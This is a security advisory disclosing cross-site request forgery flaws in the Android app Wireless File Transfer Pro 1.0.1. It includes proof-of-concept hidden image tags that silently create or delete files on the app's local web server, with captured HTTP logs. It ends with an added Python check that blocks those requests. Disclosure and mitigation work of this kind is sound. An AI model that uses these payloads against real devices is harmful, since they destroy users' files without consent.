Wireless File Transfer Pro version 1.0.1 suffers from multiple cross site request forgery vulnerabilities.
Document Title:
===============
Wireless File Transfer Pro 1.0.1 - (Android) CSRF Remote Command Execution (Create, Delete)
Release Date:
=============
2015-02-10
Product & Service Introduction:
===============================
Wireless File Transfer Pro is the advanced version of Wireless File Transfer.
(Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.lextel.WirelessFileTransferPro )
Affected Product(s):
====================
Wireless File Transfer Pro 5.9.5 - (Android) Web Application 1.0.1
Lextel Technology
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Request Method(s):
[+] [GET]
Vulnerable Module(s):
[+] browse
Vulnerable Parameter(s):
[+] fileExplorer.html?
Affected Module(s):
[+] Index of Documents (http://localhost:8888)
Technical Details & Description:
================================
A cross site request forgery vulnerability has been discovered in the Wireless File Transfer Pro 1.0.1 Android mobile web-application.
The mobile web-application is vulnerable to a combination of cross site request forgery and local command injection attacks.
Proof of Concept (PoC):
=======================
Create New Folder
<img src="http://192.168.1.2:8888/fileExplorer.html?action=create&type=folder&folderName=test1" width="0" height="0" border="0">
--- PoC Session Logs [GET] (Execution) ---
GET /fileExplorer.html?action=create&type=folder&folderName=test1 HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive
HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 4
<a href="#" onclick="actionBrower('/sdcard/test1')">test1</a></td></td><td width="24%"></td><td width="24%">2015-02-09 18:12:19</td><td width="15%">
Delete File, Folder
<img src="http://192.168.1.2:8888/fileExplorer.html?action=deleteFile&fileName=test" width="0" height="0" border="0">
--- PoC Session Logs [GET] (Execution) ---
GET /fileExplorer.html?action=deleteFile&fileName=test HTTP/1.1
Host: 192.168.1.2:8888
User-Agent: Mozilla/5.0 (Windows NT 5.2; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:8888/fileExplorer.html?action=brower&path=/sdcard
Connection: keep-alive
HTTP/1.1 200 OK
Cache-control: no-cache
Content-length: 30
Reference:
http://localhost:8888/
Security Risk:
==============
The security risk of the cross site request forgery issue and command injection vulnerability is estimated as medium. (CVSS 4.4)
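A server-side check for the requests shown in the PoC, as an added example (not code from the advisory or from the vendor's application): the state-changing actions are refused over GET and require a same-origin POST carrying a per-session token. The function names, the `csrf_token` field and the token value are assumptions made for illustration.

```python
import hmac
from urllib.parse import urlsplit, parse_qs

# Action names as they appear in the advisory's PoC requests.
STATE_CHANGING = {"create", "deleteFile"}

def same_origin(headers):
    """True only if Origin (or, failing that, Referer) names this server."""
    host = headers.get("Host", "")
    source = headers.get("Origin") or headers.get("Referer", "")
    return bool(host) and urlsplit(source).netloc == host

def allow_request(method, target, headers, form, session_token):
    """Decide whether a fileExplorer.html request may be executed.

    form is the parsed POST body; csrf_token is a hypothetical field that
    the server would embed in its own pages, bound to the session.
    """
    params = {k: v[0] for k, v in parse_qs(urlsplit(target).query).items()}
    params.update(form)
    if params.get("action", "") not in STATE_CHANGING:
        return method in ("GET", "HEAD")      # read-only browsing
    if method != "POST":
        return False                          # <img>/<a> tags can only send GET
    if not same_origin(headers):
        return False                          # cross-site form POST
    token = form.get("csrf_token", "")        # body only, never the query string
    return hmac.compare_digest(token.encode(), session_token.encode())

# Constructed sample data: host and paths from the PoC, token made up.
TOKEN = "constructed-session-token"
HOST = "192.168.1.2:8888"
POC_CREATE = "/fileExplorer.html?action=create&type=folder&folderName=test1"
POC_DELETE = "/fileExplorer.html?action=deleteFile&fileName=test"

if __name__ == "__main__":
    own_page = {"Host": HOST, "Referer": f"http://{HOST}/fileExplorer.html"}
    for target in (POC_CREATE, POC_DELETE):
        print(target, allow_request("GET", target, own_page, {}, TOKEN))
    good = {"action": "create", "type": "folder", "folderName": "test1",
            "csrf_token": TOKEN}
    print("POST", allow_request("POST", "/fileExplorer.html",
                                {"Host": HOST, "Origin": f"http://{HOST}"}, good, TOKEN))
```

Both PoC requests are rejected even when the Referer is the application's own page, because the method check comes first; the origin and token checks cover a forged cross-site form POST.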
Credits & Authors:
==================
Hadji Samir s-dz@hotmail.fr